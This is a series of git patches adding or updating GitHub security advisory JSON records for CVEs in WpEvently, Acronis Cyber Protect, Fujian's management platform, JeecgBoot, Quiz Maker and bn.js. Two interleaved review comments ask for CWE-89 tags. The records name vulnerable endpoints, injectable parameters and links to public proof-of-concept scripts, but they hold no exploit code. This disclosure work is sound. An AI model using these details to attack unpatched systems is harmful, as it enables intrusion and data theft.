diff --git a/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json b/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json index 90b9dfb485ebc..7c50124160162 100644 --- a/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json +++ b/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xgvq-3q42-wr4g", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-23549" ], "details": "Deserialization of Untrusted Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Object Injection.This issue affects WpEvently: from n/a through <= 5.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:12Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json b/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json index 6856e10f10531..0af14e86b4560 100644 --- a/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json +++ b/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xmxf-f859-45ch", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25333" ], "details": "Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through <= 1.0.11.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json b/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json index ddd4d8a099a4a..a5f3bc22e464e 100644 --- a/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json +++ b/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xprw-mh67-9xf5", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-23544" ], "details": "Deserialization of Untrusted Data vulnerability in codetipi Valenti valenti allows Object Injection.This issue affects Valenti: from n/a through <= 5.6.3.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:12Z" From 03399a29925cfd9d5aef34732fec893de656f215 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 03:33:02 +0000 Subject: [PATCH 02/77] Publish Advisories GHSA-5pfr-259p-873j GHSA-658m-53rw-9pgg GHSA-7jwr-q23r-96hf GHSA-8823-cww3-2gv3 GHSA-8f5v-g9hx-qc4q GHSA-p3p8-xvrh-mwgr GHSA-vvcr-j24q-wc29 GHSA-xj5x-4c9j-jr89 --- .../GHSA-5pfr-259p-873j.json | 36 ++++++++++++ .../GHSA-658m-53rw-9pgg.json | 56 +++++++++++++++++++ .../GHSA-7jwr-q23r-96hf.json | 56 +++++++++++++++++++ .../GHSA-8823-cww3-2gv3.json | 44 +++++++++++++++ .../GHSA-8f5v-g9hx-qc4q.json | 48 ++++++++++++++++ .../GHSA-p3p8-xvrh-mwgr.json | 36 ++++++++++++ .../GHSA-vvcr-j24q-wc29.json | 36 ++++++++++++ .../GHSA-xj5x-4c9j-jr89.json | 36 ++++++++++++ 8 files changed, 348 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-5pfr-259p-873j/GHSA-5pfr-259p-873j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-658m-53rw-9pgg/GHSA-658m-53rw-9pgg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7jwr-q23r-96hf/GHSA-7jwr-q23r-96hf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8823-cww3-2gv3/GHSA-8823-cww3-2gv3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8f5v-g9hx-qc4q/GHSA-8f5v-g9hx-qc4q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p3p8-xvrh-mwgr/GHSA-p3p8-xvrh-mwgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json diff --git a/advisories/unreviewed/2026/02/GHSA-5pfr-259p-873j/GHSA-5pfr-259p-873j.json b/advisories/unreviewed/2026/02/GHSA-5pfr-259p-873j/GHSA-5pfr-259p-873j.json new file mode 100644 index 0000000000000..4b806f6e4d4d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5pfr-259p-873j/GHSA-5pfr-259p-873j.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5pfr-259p-873j",
+ "modified": "2026-02-20T03:31:39Z",
+ "published": "2026-02-20T03:31:39Z",
+ "aliases": [
+ "CVE-2025-30411"
+ ],
+ "details": "Sensitive data disclosure and manipulation due to improper authentication. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, Windows) before build 41800.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30411"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security-advisory.acronis.com/advisories/SEC-8768"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1390"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T01:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-658m-53rw-9pgg/GHSA-658m-53rw-9pgg.json b/advisories/unreviewed/2026/02/GHSA-658m-53rw-9pgg/GHSA-658m-53rw-9pgg.json
new file mode 100644
index 0000000000000..736bddac5788c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-658m-53rw-9pgg/GHSA-658m-53rw-9pgg.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-658m-53rw-9pgg",
+ "modified": "2026-02-20T03:31:40Z",
+ "published": "2026-02-20T03:31:39Z",
+ "aliases": [
+ "CVE-2026-2820"
+ ],
+ "details": "A security flaw has been discovered in Fujian Smart Integrated Management Platform System up to 7.5. This issue affects some unknown processing of the file /Module/CRXT/Controller/XAccessPermissionPlus.ashx. The manipulation of the argument DeviceIDS results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2820"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/luoye197-prog/cve-yinda-sql/blob/main/introduce"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/luoye197-prog/cve-yinda-sql/blob/main/poc.py"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346945"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346945"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753397"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T02:16:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7jwr-q23r-96hf/GHSA-7jwr-q23r-96hf.json b/advisories/unreviewed/2026/02/GHSA-7jwr-q23r-96hf/GHSA-7jwr-q23r-96hf.json
new file mode 100644
index 0000000000000..ebb9931d38611
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7jwr-q23r-96hf/GHSA-7jwr-q23r-96hf.json
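Review bot: `cwe_ids` in GHSA-658m-53rw-9pgg lists only the generic `CWE-74` although `details` describes SQL injection through the `DeviceIDS` argument, so a consumer that filters or alerts on the SQL-injection class will miss this record; I would make the entry `"CWE-89"`, or list it next to `"CWE-74"`. The same applies to GHSA-7jwr-q23r-96hf (argument `ChannelName`, file `/Module/CRXT/Controller/XCamera.ashx`). Both records carry `E:P` in the v4.0 vector and reference a published proof of concept, yet `affected` is `[]`, so the "up to 7.5" bound exists only in prose and range-based scanners will not match it.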
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7jwr-q23r-96hf",
+ "modified": "2026-02-20T03:31:40Z",
+ "published": "2026-02-20T03:31:40Z",
+ "aliases": [
+ "CVE-2026-2821"
+ ],
+ "details": "A weakness has been identified in Fujian Smart Integrated Management Platform System up to 7.5. Impacted is an unknown function of the file /Module/CRXT/Controller/XCamera.ashx. This manipulation of the argument ChannelName causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2821"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/luoye197-prog/cve-yinda-sql2/blob/main/introduce"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/luoye197-prog/cve-yinda-sql2/blob/main/poc.py"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346946"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346946"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753405"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T03:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8823-cww3-2gv3/GHSA-8823-cww3-2gv3.json b/advisories/unreviewed/2026/02/GHSA-8823-cww3-2gv3/GHSA-8823-cww3-2gv3.json
new file mode 100644
index 0000000000000..a4837db4ed474
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8823-cww3-2gv3/GHSA-8823-cww3-2gv3.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8823-cww3-2gv3",
+ "modified": "2026-02-20T03:31:40Z",
+ "published": "2026-02-20T03:31:40Z",
+ "aliases": [
+ "CVE-2026-2384"
+ ],
+ "details": "The Quiz Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `vc_quizmaker` shortcode in all versions up to, and including, 6.7.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\nNote: This vulnerability requires WPBakery Page Builder to be installed and active",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2384"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.1.7/pb_templates/quiz_maker_wpbvc.php#L13"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.1.7/pb_templates/quiz_maker_wpbvc.php#L60"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e54e2831-e5e9-43f4-acb6-9cf00fdb4e57?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T03:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8f5v-g9hx-qc4q/GHSA-8f5v-g9hx-qc4q.json b/advisories/unreviewed/2026/02/GHSA-8f5v-g9hx-qc4q/GHSA-8f5v-g9hx-qc4q.json
new file mode 100644
index 0000000000000..535ec65b4021d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8f5v-g9hx-qc4q/GHSA-8f5v-g9hx-qc4q.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8f5v-g9hx-qc4q",
+ "modified": "2026-02-20T03:31:39Z",
+ "published": "2026-02-20T03:31:39Z",
+ "aliases": [
+ "CVE-2026-2819"
+ ],
+ "details": "A vulnerability was identified in Dromara RuoYi-Vue-Plus up to 5.5.3. This vulnerability affects the function SaServletFilter of the file /workflow/instance/deleteByInstanceIds of the component Workflow Module. The manipulation leads to missing authorization. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2819"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346944"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346944"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753321"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T02:16:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p3p8-xvrh-mwgr/GHSA-p3p8-xvrh-mwgr.json b/advisories/unreviewed/2026/02/GHSA-p3p8-xvrh-mwgr/GHSA-p3p8-xvrh-mwgr.json
new file mode 100644
index 0000000000000..9d310c24b3400
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p3p8-xvrh-mwgr/GHSA-p3p8-xvrh-mwgr.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p3p8-xvrh-mwgr",
+ "modified": "2026-02-20T03:31:39Z",
+ "published": "2026-02-20T03:31:39Z",
+ "aliases": [
+ "CVE-2025-30416"
+ ],
+ "details": "Sensitive data disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, Windows) before build 41800.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30416"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security-advisory.acronis.com/advisories/SEC-8766"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T01:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json b/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json
new file mode 100644
index 0000000000000..73ab5625a0540
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vvcr-j24q-wc29",
+ "modified": "2026-02-20T03:31:39Z",
+ "published": "2026-02-20T03:31:39Z",
+ "aliases": [
+ "CVE-2025-30410"
+ ],
+ "details": "Sensitive data disclosure and manipulation due to missing authentication. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 39870, Acronis Cyber Protect 16 (Linux, macOS, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, macOS, Windows) before build 41800.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30410"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security-advisory.acronis.com/advisories/SEC-8641"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T01:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json b/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json
new file mode 100644
index 0000000000000..e7bff5ad48ee1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj5x-4c9j-jr89", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30412" + ], + "details": "Sensitive data disclosure and manipulation due to improper authentication. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30412" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8598" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1390" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file From 8b38a69ce3b3c24cad9b3d4cd95afa245b2ddd0d Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 06:32:23 +0000 Subject: [PATCH 03/77] Publish Advisories GHSA-2h5p-xm7c-389w GHSA-378v-28hj-76wf GHSA-5fgx-x2mx-c652 GHSA-6fw7-r4h4-7857 GHSA-6wwj-pg79-rf37 GHSA-7544-9rpr-83f6 GHSA-cg6c-xr24-rrqf GHSA-j27m-px7h-crj7 GHSA-p922-cfp2-x9v3 GHSA-w4rx-r6r4-5c2v GHSA-w8hp-9h4v-r2fg GHSA-wr9x-74ff-qxqp --- .../GHSA-2h5p-xm7c-389w.json | 52 ++++++++++++++++ .../GHSA-378v-28hj-76wf.json | 60 +++++++++++++++++++ .../GHSA-5fgx-x2mx-c652.json | 52 ++++++++++++++++ .../GHSA-6fw7-r4h4-7857.json | 25 ++++++++ .../GHSA-6wwj-pg79-rf37.json | 52 ++++++++++++++++ .../GHSA-7544-9rpr-83f6.json | 25 ++++++++ .../GHSA-cg6c-xr24-rrqf.json | 25 ++++++++ .../GHSA-j27m-px7h-crj7.json | 25 ++++++++ .../GHSA-p922-cfp2-x9v3.json | 25 ++++++++ .../GHSA-w4rx-r6r4-5c2v.json | 25 ++++++++ .../GHSA-w8hp-9h4v-r2fg.json | 25 ++++++++ .../GHSA-wr9x-74ff-qxqp.json | 25 ++++++++ 12 files changed, 416 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2h5p-xm7c-389w/GHSA-2h5p-xm7c-389w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6fw7-r4h4-7857/GHSA-6fw7-r4h4-7857.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7544-9rpr-83f6/GHSA-7544-9rpr-83f6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cg6c-xr24-rrqf/GHSA-cg6c-xr24-rrqf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j27m-px7h-crj7/GHSA-j27m-px7h-crj7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json diff --git a/advisories/unreviewed/2026/02/GHSA-2h5p-xm7c-389w/GHSA-2h5p-xm7c-389w.json b/advisories/unreviewed/2026/02/GHSA-2h5p-xm7c-389w/GHSA-2h5p-xm7c-389w.json new file mode 100644 index 0000000000000..7e23355a1d293 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2h5p-xm7c-389w/GHSA-2h5p-xm7c-389w.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2h5p-xm7c-389w", + "modified": "2026-02-20T06:30:39Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2822" + ], + "details": "A security vulnerability has been detected in JeecgBoot up to 3.9.1. The affected element is an unknown function of the file /jeecgboot/sys/dict/loadDict/airag_app,1,create_by of the component Backend Interface. Such manipulation of the argument keyword leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2822" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346947" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346947" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753792" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/meizhiyuwai/ha3yxb/lowxgbh5nne881e6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T05:17:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json b/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json new file mode 100644 index 0000000000000..b195f365c2995 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json 
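Review bot: `cwe_ids` in the GHSA-2h5p-xm7c-389w record lists only the generic `CWE-74`, although `details` states the outcome is SQL injection through the `keyword` argument. Anyone filtering or routing advisories by weakness class will not find this under SQL injection. Adding the specific class would fix that: `"cwe_ids": ["CWE-74", "CWE-89"]`.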
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-378v-28hj-76wf",
+ "modified": "2026-02-20T06:30:39Z",
+ "published": "2026-02-20T06:30:39Z",
+ "aliases": [
+ "CVE-2026-2739"
+ ],
+ "details": "This affects versions of the package bn.js before 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2739"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/issues/186"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/issues/316"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/pull/317"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/commit/33df26b5771e824f303a79ec6407409376baa64b"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-835"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T05:17:53Z"
+ }
+}
\ No newline at end of file
